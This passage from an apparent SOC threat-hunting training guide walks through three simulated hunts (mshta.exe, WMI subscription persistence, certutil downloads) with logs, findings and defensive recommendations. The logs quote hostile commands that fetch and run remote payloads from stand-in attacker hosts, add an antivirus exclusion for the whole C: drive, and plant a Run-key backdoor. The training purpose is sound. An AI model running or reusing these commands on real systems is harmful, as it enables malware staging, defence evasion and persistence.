7. Develop detection for Office spawning scripting tools (PowerShell)
• Next Steps:
o Check for persistence mechanisms (registry run keys, scheduled tasks)
o Run network sweep to identify similar DNS or IP communication
o Tune EDR to alert earlier on Office to PowerShell execution chains
SCENARIO 8: ABUSE OF LIVING-OFF-THE-LAND BINARIES (LOLBINS) FOR DEFENCE
EVASION AND EXECUTION

Background: A detection engineering team notices that mshta.exe, a legitimate Windows

binary, has been used in an unusual context on a user workstation. The binary executed a
remote HTA (HTML Application) file from an external IP address. A threat hunt is launched
to investigate the abuse of LOLBins in the environment, particularly for code execution and
evasion.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker is abusing trusted Windows binaries (LOLBins) such as mshta.exe

to execute malicious code and evade traditional security controls.

TTP Reference (MITRE ATT&CK):

• T1218.005: Signed Binary Proxy Execution – mshta.exe

• T1106: Execution – Native API
• T1059.005: Command and Scripting Interpreter – Visual Basic
• T1055: Process Injection
• T1140: Deobfuscate/Decode Files or Information

Scope of Hunt:

• Timeframe: Last 10 days

• Target: All endpoints (focus on workstations)
• Data sources: Sysmon, EDR, Proxy logs, PowerShell logs
• Focus: LOLBins such as mshta.exe, rundll32.exe, regsvr32.exe, certutil.exe

Telemetry to Review:

• Process execution logs

• Parent-child process relationships
• Network connections by LOLBins
• File writes or script downloads from LOLBin processes

2. EXECUTE

Sysmon Event ID 1 – Process Creation (LOLBin Execution):

Date: 2025-07-16 09:47:51

Process: mshta.exe
Command Line: mshta.exe http://198.51.100.55/payload.hta
Parent Process: explorer.exe
User: marketing_exec01
Host: MKT-WS-06
SHA256: 324fad66... (mshta.exe, verified Microsoft-signed binary)

Network Connection Log (Sysmon Event ID 3):

Process: mshta.exe
Destination IP: 198.51.100.55
Port: 80
Protocol: HTTP
Country: Germany
Outcome: 200 OK
User-Agent: mshta/1.0

EDR Alert:

• Behaviour: Signed binary used to execute remote script

• HTA script launched embedded PowerShell command
• Further spawned:
o powershell.exe -w hidden -enc JAB...
o connection to http://198.51.100.55/loader.ps1
• Final payload: Executed Add-MpPreference -ExclusionPath C:\ (AV exclusion)

Script Analysis (HTA file):

• VBScript embedded in HTA decoded to PowerShell stager

• Downloader connects to C2 and fetches backdoor script
• Script writes to C:\Users\Public\Tools\rat.ps1

Proxy Log:

User: marketing_exec01
URL: http://198.51.100.55/payload.hta
URL: http://198.51.100.55/loader.ps1
Referrer: None
Total Bytes Out: 1,200
Total Bytes In: 1,450,000

3. ANALYSE

Investigation Findings:
 1. LOLBins Misuse Confirmed:
mshta.exe, a trusted Microsoft binary, was used to load a remote HTA file via HTTP.
This allowed execution to bypass application whitelisting and AV detection.
2. Script Chain Identified:
HTA file decoded to PowerShell, which fetched and executed loader.ps1 – a stager
for a persistent remote access tool.
3. Command Execution Observed:
PowerShell was used to disable or bypass Windows Defender via exclusion
settings.
4. Victim Profile:
User marketing_exec01 claimed to have clicked a document linked in an email that
opened and closed quickly. No warning was shown to the user.
5. Persistence Not Yet Confirmed:
No evidence of scheduled tasks or registry persistence yet observed, but further
investigation required.

This is a clear example of LOLBin abuse for initial execution and evasion. mshta.exe was
used as a signed proxy binary to launch malicious code, followed by PowerShell
downloaders, which attempted to weaken AV defences.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Abuse of mshta.exe for Remote Code Execution
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversary may be using trusted Windows binaries (LOLBins) to execute
remote payloads and avoid detection
• Findings:
o mshta.exe launched via user click to open http://198.51.100.55/payload.hta
o HTA file contained VBScript that executed PowerShell with encoded
downloader
o Downloader script fetched secondary payload and created AV exclusion
rules
o Network connection logs confirm exfil from MKT-WS-06 to malicious
infrastructure
o Toolset and TTPs align with known LOLBin-based campaigns used by
stealthy APTs
• MITRE Techniques Observed:
o T1218.005 (mshta.exe proxy execution)
o T1059.001 (PowerShell)
o T1105 (Ingress Tool Transfer)
o T1562.001 (Defence Evasion – Disable AV)
• Recommendations:
1. Isolate host MKT-WS-06 immediately
2. Revoke user account credentials and investigate mail source
3. Block outbound access to 198.51.100.55 and similar dynamic infrastructure
4. Prevent execution of mshta.exe via GPO or endpoint protection on user
systems
5. Review all other LOLBin executions organisation-wide (certutil.exe,
regsvr32.exe, etc.)
6. Enable script block logging and advanced PowerShell logging
7. Reimage affected endpoint after triage
• Next Steps:
o Investigate potential persistence mechanisms not yet triggered
o Perform YARA scan across all systems for rat.ps1 indicators
o Update SOC content to detect LOLBin-based execution chains
SCENARIO 9: SUSPICIOUS PERSISTENCE VIA WMI EVENT SUBSCRIPTION

Background: An internal red team simulation uncovered persistence maintained via WMI
(Windows Management Instrumentation) event subscriptions. Since this technique is
stealthy and fileless, the SOC launches a proactive threat hunt to check if any real-world
adversaries are using WMI for persistence inside the environment.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis: An attacker may have established stealthy persistence on endpoints using

WMI permanent event subscriptions, which trigger malicious code execution based on
system events like user logon or scheduled time.

TTP Reference (MITRE ATT&CK):

• T1546.003: Event Triggered Execution – WMI Event Subscription

• T1053.005: Scheduled Task for secondary execution
• T1059.001: PowerShell Execution
• T1216: System Script Proxy Execution

Scope of Hunt:

• Timeframe: Past 30 days

• Target: Workstations and servers (high-priority: domain-joined hosts)
• Data Sources: WMI repository dump, Sysmon logs, PowerShell logs, EDR telemetry
• Focus: Unusual __EventFilter, __EventConsumer and __FilterToConsumerBinding
entries

Telemetry to Review:

• WMI repository content from ROOT\Subscription namespace

• Sysmon Event ID 1 and 13
• Any cmdline or process triggered by WMI consumers
• Registry (if script path is referenced)

2. EXECUTE

WMI Repository Dump from Host (ENG-WS-17):

EventFilter:

Name: LogonTrigger
Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance
ISA 'Win32_ComputerSystem' AND TargetInstance.UserName != NULL
Namespace: root\cimv2

EventConsumer:

Name: EvilConsumer
Type: CommandLineEventConsumer
CommandLineTemplate: powershell.exe -nop -w hidden -enc JAB...
WorkingDirectory: C:\Users\Public

FilterToConsumerBinding:

Filter: LogonTrigger
Consumer: EvilConsumer

Sysmon Event ID 1 – Triggered Process:

Date: 2025-07-10 09:22:44

Process: powershell.exe
Parent: wmiprvse.exe
Command Line: powershell.exe -nop -w hidden -enc JAB...
SHA256: b2f84d9912...

Sysmon Event ID 13 – Registry Modification:

Process: powershell.exe
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svcstart
Value: rundll32.exe "C:\Users\Public\backdoor.dll",Entry

EDR Telemetry:

• Triggered process tree:

wmiprvse.exe → powershell.exe → dropped backdoor DLL
• No parent process linked to user activity
• DLL contains reverse shell code on port 5555 (not blocked by host firewall)

3. ANALYSE

Findings:

1. WMI Persistence Artifact:

A WMI event subscription (LogonTrigger) is set to activate on user logon. This is
uncommon and rarely used in legitimate enterprise scenarios.
 2. Payload Execution via PowerShell:
When triggered, wmiprvse.exe launches PowerShell with an encoded command
that creates a Run key to execute a backdoor DLL at user login.
3. No Scheduled Task or File Dropper:
This persistence is fileless and invisible to most traditional endpoint scanners
unless WMI activity is explicitly audited.
4. EDR Flagged DLL:
The DLL created was flagged on VirusTotal (42/71) and connects to an external IP on
an unusual port, confirming potential backdoor functionality.

An adversary has established WMI-based stealth persistence, enabling execution of

payloads on logon without leaving typical file artefacts or scheduled task entries. This
technique is indicative of advanced post-exploitation behaviour.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Stealth Persistence via WMI Event Subscription
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversaries may use WMI event subscriptions to establish hidden
persistence mechanisms
• Findings:
o Host ENG-WS-17 has WMI subscription in ROOT\Subscription triggering
PowerShell on user logon
o Triggered PowerShell command sets autorun key for DLL execution
o DLL opens reverse shell and is flagged malicious on VirusTotal
o Execution chain traced to wmiprvse.exe, no user interaction observed
o No legitimate software or policy explains this WMI activity
• MITRE Techniques Observed:
o T1546.003 (WMI Event Subscription)
o T1059.001 (PowerShell Execution)
o T1055 (DLL Injection)
o T1105 (Remote Access Tool download)
• Recommendations:
1. Remove WMI filter, consumer and binding via wbemtest or PowerShell CIM
commands
2. Isolate ENG-WS-17 for forensic triage
3. Hunt for similar subscriptions in enterprise using WMI dump scripts
4. Block rundll32.exe execution from non-standard folders via endpoint
controls
5. Detect wmiprvse.exe spawning PowerShell in SIEM/EDR
 6. Audit domain for other systems with abnormal WMI objects in
ROOT\Subscription
• Next Steps:
o Create detection rules for WMI subscription abuse
o Enforce GPO to restrict creation of WMI consumers
o Train SOC analysts on WMI persistence detection techniques
SCENARIO 10: SUSPICIOUS USE OF CERTUTIL FOR PAYLOAD DOWNLOAD AND
EXECUTION

Background: SOC receives a tip from a threat intel provider that attackers are increasingly
abusing certutil.exe, a legitimate Windows utility, to download malicious files and evade
detection. A recent EDR anomaly shows a rarely used host executing certutil.exe with
network activity. A threat hunt is initiated to check for abuse of certutil across the
enterprise.

THREAT HUNTING USING PEAK FRAMEWORK

1. PLAN

Hypothesis:
An attacker is using certutil.exe to download or decode malicious files as part of initial
access or staging, taking advantage of its trusted, signed nature to bypass defences.

TTP Reference (MITRE ATT&CK):

• T1218.010: Signed Binary Proxy Execution – certutil.exe

• T1105: Ingress Tool Transfer
• T1140: Deobfuscate/Decode Files or Information
• T1204.002: User Execution – Malicious File

Scope of Hunt:

• Timeframe: Last 14 days

• Target: All Windows endpoints
• Data sources: Sysmon (Process Creation), EDR, Web proxy logs, DNS logs
• Focus: Instances where certutil.exe was used with /urlcache or /decode or called
from user folders

Telemetry to Review:

• Process command lines for certutil.exe

• Network connections from certutil.exe
• File writes (dropped .exe, .dll, .bat files)
• DNS resolutions for suspicious domains

2. EXECUTE

Sysmon Event ID 1 – Process Creation:

Date: 2025-07-15 22:14:33

Process: certutil.exe
Command Line: certutil.exe -urlcache -split -f http://malicious[.]site/payload.exe
C:\Users\Public\Downloads\tools.exe
Parent: cmd.exe
User: staff_admin02
Host: OPS-WS-23
SHA256: valid Microsoft signed binary

Sysmon Event ID 11 – File Create:

File Created: C:\Users\Public\Downloads\tools.exe

Process: certutil.exe
File Size: 865 KB
Hash: 6b4f89c0...

Sysmon Event ID 1 – Secondary Execution:

Date: 2025-07-15 22:15:01

Process: tools.exe
Parent Process: explorer.exe
User: staff_admin02
Network Connection: 144.76.12.88:443 (Germany)
Command Line: tools.exe --checkin --stealth

EDR Alert:

• Unusual use of certutil observed

• tools.exe triggered behaviour detection:
o Injected into explorer.exe
o Added itself to HKCU\Software\Microsoft\Windows\CurrentVersion\Run
o Contacted external IP over HTTPS with suspicious User-Agent

Proxy Logs:

URL: http://malicious.site/payload.exe
Category: Uncategorised / Newly Registered Domain
Bytes In: 865,000
Bytes Out: 2,500
Downloaded by: certutil.exe

Threat Intel Check:

• malicious[.]site flagged in multiple feeds

• IP address linked to previous phishing campaigns
3. ANALYSE

Findings:

1. Certutil Abused as Downloader:

certutil.exe was used to download an .exe file from a known malicious domain and
save it to a public user folder.
2. Process Execution Chain:
The dropped executable was launched soon after download, indicating either user
interaction or script-based automation.
3. Malicious Behaviour Detected:
The tool performed process injection, created persistence via registry Run key and
reached out to an external IP with low reputation.
4. No Legitimate Reason for Use:
User staff_admin02 had no legitimate task involving certificate management or
certutil. Machine was a standard workstation.
5. Time of Execution:
Activity occurred after 10PM, outside normal business hours.

This is a textbook example of living-off-the-land abuse using certutil.exe to stage malware.

The attacker successfully downloaded and executed a binary without triggering AV at the
time, likely evading detection due to use of a signed binary.

4. COMMUNICATE

Threat Hunting Report

• Title: Threat Hunt Report – Malicious File Delivery via Certutil Abuse
• Date: 2025-07-20
• Hunter: Izzmier (SOC Threat Hunter)
• Hypothesis: Adversaries are using certutil.exe to download and execute payloads
under the guise of legitimate tools
• Findings:
o certutil.exe executed by staff_admin02 on OPS-WS-23 with flag -urlcache
o Downloaded tools.exe from http://malicious.site/, saved to public
Downloads folder
o File was executed within seconds, connected to C2 server and attempted
persistence
o Tools.exe showed suspicious behaviour including process injection and
registry modification
o No business justification for use of certutil by this user on that endpoint
• MITRE Techniques Observed:
o T1218.010 (Signed Binary Proxy Execution – certutil.exe)
o T1105 (Ingress Tool Transfer)
 o T1055 (Process Injection)
o T1547.001 (Registry Run Key Persistence)
• Recommendations:
1. Isolate OPS-WS-23 and submit tools.exe for malware analysis
2. Revoke and reset credentials for staff_admin02
3. Block access to malicious.site and IP 144.76.12.88 at proxy/firewall
4. Add rules to prevent certutil.exe from making outbound connections
5. Monitor for use of certutil, especially with flags -urlcache, -decode or -f
6. Develop SIEM rules to detect LOLBin abuse via command line patterns
• Next Steps:
o Sweep enterprise for similar certutil executions
o Create allowlist of legitimate certutil.exe usage contexts
o Train analysts and red teamers on detection and simulation of LOLBin use